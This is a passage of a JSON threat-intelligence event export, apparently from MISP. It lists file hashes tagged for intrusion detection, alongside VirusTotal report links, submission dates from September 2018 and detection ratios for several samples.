"a826a3c1-863e-4783-a3d7-6681f99f56c4", "value": "https://www.virustotal.com/file/31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78/analysis/1537327879/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334490", "to_ids": false, "type": "text", "uuid": "13fdd406-d4b9-4915-b544-d01eafb9c379", "value": "42/67" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334493", "uuid": "f092ea7b-05e2-4d29-8196-a214407feb5e", "ObjectReference": [ { "comment": "", "object_uuid": "f092ea7b-05e2-4d29-8196-a214407feb5e", "referenced_uuid": "0483921b-12e2-450d-97c6-543e513e4a6a", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-78cc-4440-a082-4a7d02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334490", "to_ids": true, "type": "md5", "uuid": "00aac258-a390-4f11-bfb8-ea78eef73f68", "value": "1ef7d145bf7153292ea33fe7c900ece9" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334490", "to_ids": true, "type": "sha1", "uuid": "b2c5b04a-39cf-4e61-a5d9-00601f12a8fc", "value": "8f0323e577d4df82c7faa4cd6ba7303b38b6a26e" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334491", "to_ids": true, "type": "sha256", "uuid": "d901ba15-1665-4163-b728-4db92e941209", "value": "ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334491", "uuid": "0483921b-12e2-450d-97c6-543e513e4a6a", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334491", "to_ids": false, "type": "datetime", "uuid": "2a60357e-ee2f-464b-94fe-aaecf41cc0dd", "value": "2018-09-19T03:31:28" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334491", "to_ids": false, "type": "link", "uuid": "7a27e755-1f59-493b-9614-e9179f2be1e6", "value": "https://www.virustotal.com/file/ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50/analysis/1537327888/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334492", "to_ids": false, "type": "text", "uuid": "eb43528e-3ebb-45ba-a024-ab76913aa644", "value": "38/66" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334495", "uuid": "9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "ObjectReference": [ { "comment": "", "object_uuid": "9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "referenced_uuid": "871efca7-2ad6-4bfe-a116-dcd8cf14fb6a", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-dabc-477b-afd0-4f8f02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334492", "to_ids": true, "type": "md5", "uuid": "12f97b8f-abbd-4b32-9a94-63ff17e444c0", "value": "a6484c6e007b1277164dd49115e5e271" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334492", "to_ids": true, "type": "sha1", "uuid": "2cbf9628-b3b0-49cd-927e-e210c918d760", "value": "0308aaea4d969bc7fe4391e86b14c4908ab6adbe" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334493", "to_ids": true, "type": "sha256", "uuid": "097d6023-b13c-4daf-abd7-df0e70c02a0d", "value": "09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334493", "uuid": "871efca7-2ad6-4bfe-a116-dcd8cf14fb6a", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334493", "to_ids": false, "type": "datetime", "uuid": "2b1a7a8f-99fc-4684-98e7-f38d718555a8", "value": "2018-09-18T12:02:50" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334494", "to_ids": false, "type": "link", "uuid": "7d67a45d-37b8-4972-93be-68eb79124851", "value": "https://www.virustotal.com/file/09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885/analysis/1537272170/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334494", "to_ids": false, "type": "text", "uuid": "f916ec81-9212-4dc6-bef9-dc7982bd15a3", "value": "20/58" } ] } ] } }